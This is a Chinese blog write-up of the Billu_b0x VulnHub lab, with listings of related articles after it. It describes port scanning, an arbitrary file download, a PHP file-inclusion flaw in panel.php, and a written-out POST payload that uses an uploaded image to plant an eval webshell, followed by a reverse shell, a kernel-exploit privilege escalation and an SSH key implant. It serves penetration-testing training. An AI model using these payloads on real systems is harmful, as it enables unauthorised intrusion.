vulnhub:Billu_b0x

最新推荐文章于 2025-05-16 06:00:00 发布
原创 最新推荐文章于 2025-05-16 06:00:00 发布 · 2.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文档详细介绍了在Vulnhub上进行的Billu_b0x靶机挑战。首先通过nmap进行端口扫描,接着审计HTML源码和使用SQLmap。发现任意文件下载漏洞,继而进行代码审计,揭示了文件包含攻击的可能性。尽管遇到了文件上传验证的阻碍,但最终成功获取数据库凭证,并利用phpmyadmin登录。通过上传图片马和构造payload,实现了远程连接和shell反弹,为进一步提权奠定了基础。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境搭建

https://download.vulnhub.com/billu/Billu_b0x.zip
hash:ebcb435522917a67b54274900b37c6af

开搞

首先nmap开路

image
访问http://192.168.14.149/
image

向世界上最帅老男人致敬

查看HTML源码并没什么*用,SQLmap无果后遍历目录
image
访问http://192.168.14.149/test.php报错缺少参数file
image
尝试POST提交file=test.php此处为任意文件下载,将目录遍历出的文件全部下载开始代码审计。
image

审计

主页登录成功后跳转至panel.php查看panel.php源码第33行起,当load为非add与show时可构造任意文件包含攻击

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}

文件上传验证文件后缀与文件类型,经测试无法构造绕过。

$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
利用

c.php中找到数据库账号密码billu/b0x_billu,登录phpmyadmin找到用户名口令
image
登录成功后上传图片马到uploaded_images/目录下构造payload如下

POST /panel.php
continue=&load=uploaded_images/trial.png&trial=file_put_contents('test.php','<?php @eval($_POST[test]);?>');

菜刀连接uploaded_images/test.php查看版本
image
反弹shell
image
提权
image
https://www.exploit-db.com/exploits/37292/
写入免密密匙 然后。。就没有然后了

VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1180
该靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
Vulnhub靶场 Billu_b0x 练习
Reset
11-15 1023
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录,依次访问。发现一个index登录页,phpmyadmin的登录页。在test页根据提示发现了文件包含,可以读取源码。文件包含查看源码,发现sql查询语句,根据这个语句进行sql注入,成功登录index页面。上传图片马,执行系统命令,进行反弹shell。读取配置文件,获取敏感信息,进行ssh链接。获得系统的版本信息,进行内核提权。
Billu_b0x
weixin_43741181的博客
11-24 478
信息收集 扫描主机c段ip找到靶机ip地址 识别端口和服务 在22和80端口分别发现了SSH服务和web服务。 打开web页面,提示输入 漏洞发现 0x01.页面提示有注入,测试注入。 查看源码,没有发现, fuzz 以及很多尝试都没有结果。 0x02.爆破目录 用dirbuster爆破,发现很多页面,这里没有扫描完毕 0x03 获取源码 上述test.php中提示要传一个file...
[网安靶场] 红队综合渗透靶场 —— VulnHub · 靶场笔记合集
最新发布
Blue17 の 小窝
05-16 571
VulnHub 平台目前由 Kali Linux 的开发团队 Offsec 维护,内部拥有超过 600 个镜像,且所有资源免费下载,帮助用户在合法环境中模拟真实攻击链,提升实战能力。VulnHub 是一个专注于网络安全实战训练的靶场平台,平台内提供了大量预置漏洞的虚拟机镜像,供安全爱好者学习渗透测试技术。VulnHub —— Breach : 1 —— 🚩 Tomcat 后台入侵 + 数据库信息收集 + Sudo & 定时任务提权。0x01:VulnHub —— 靶场初识。
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7941
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 4578
CTF综合靶场渗透系列-Billu_b0x
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2720
VulnHub靶场渗透实战11-Billu_b0x
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 520
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
vulnhub靶机Billu_b0x渗透测试
Long_gone的博客
10-11 569
打开靶机后先扫描靶机IP: netdiscover 确定靶机IP后扫描端口开放情况: nmap -sV -A -p 0-65535 192.168.34.163 可以看见有22和80端口开放,然后访问页面看一下: 是一个登录界面,然后扫描一下目录看看有扫描东西: dirb http://192.168.34.163 dirb http://192.168.34.163 -X .php...
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1709
test。
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 924
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
[VulnHub靶机渗透]一:billu_b0x
qq_45927819的博客
03-06 3605
文章目录实验环境实验步骤一、信息收集1.1 扫描主机所在网段进行主机发现1.2 端口扫描1.3 网站指纹信息扫描(whatweb)1.4 dirb爆破Web目录二、web渗透2.1 ssh爆破并获取shell2.2 web站点渗透2.2.1 index.php(登陆界面)2.2.2 add.php (空壳文件)2.2.3 test.php(文件包含可利用)2.2.4 phpmy (phpmyadmin)补充:2.2.5 phpmyadmin挂马2.2.5.1 利用outfile写文件挂马**2.2.5.2
Vulnhub靶机 Billu_b0x(渗透测试详解)
2301_80358831的博客
12-01 1128
Vulnhub靶机 Billu_b0x(渗透测试详解)
靶机练习-1:billu_b0X
yifujiadeng的博客
01-12 1209
靶机练习-1:billu_b0X 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.1.137 渗透步骤: 信息收集: 1.ip发现 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址, 目标靶机ip为192.168.1.132 或者使用命令arp-scan -l扫描,效果相同,且不扫描本机
vulnhub-Billu_b0x
qq_43006864的博客
03-27 932
题目:Billu_b0x 攻击机:kali-linux ip地址: 靶机:vulnhub-Billu_b0x 开始解题: 一、信息收集: nmap获取目标主机信息: 这一步主要获取目标主机的端口信息等,先对整段进行扫描。 这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。 这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。 nmap -sS -sV -A -p- 192.168.1.103 出
VulnHub靶场之Billu_b0x
A_dmin的博客
12-18 1629
VulnHub靶场之Billu_b0x emmm,好久没玩靶机实验了,今天玩一下!! 用vm打开靶机,把网络适配改为NAT,然后运行kali和靶机
billu_b0x下载百度
03-19
<think>好的,我需要处理用户关于下载billu_b0x的请求。首先,用户提到想通过百度网盘下载这个资源,并引用了某个参考来源。根据引用内容,用户可能已经有一个百度网盘的链接,但需要提取码wxhn。不过,我需要验证这个链接是否仍然有效,以及资源是否安全合规。 接下来,我需要考虑用户可能遇到的问题。例如,链接失效、提取码错误,或者下载后的文件无法正确导入VMware。此外,用户可能对设置NAT模式的网络配置有疑问,或者渗透测试过程中遇到技术障碍。 另外,用户的需求可能不仅限于下载,还可能包括如何配置环境和进行后续的渗透测试步骤。因此,生成相关问题时,需要涵盖下载步骤、环境配置、常见问题解决以及实际应用场景。 最后,要确保回答符合系统级指令,正确使用LaTeX格式,并添加引用标识。同时,保持回答结构清晰,分步骤帮助用户解决问题,并保证信息的准确性和安全性。</think>关于billu_b0x靶场资源的下载与使用,根据引用内容中提供的信息[^1],具体操作步骤如下: 1. **百度网盘下载** - 访问百度网盘链接(需自行搜索最新有效链接) - 输入提取码:$wxhn$(注意字母大小写) - 下载后解压得到虚拟机文件 2. **虚拟机配置** ```bash # 设置NAT模式网络 VMware菜单栏 > 编辑 > 虚拟网络编辑器 > 选择NAT模式 ``` 需确保攻击机(如Kali Linux)和靶机使用相同的网络模式,配置示意图: $$ \begin{cases} \text{攻击机IP} \in 192.168.153.0/24\\ \text{靶机IP} \in 192.168.153.0/24 \end{cases} $$ 3. **渗透测试验证** 建议使用Nmap进行基础探测: ```python import nmap scanner = nmap.PortScanner() scanner.scan('192.168.153.0/24', arguments='-sP') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值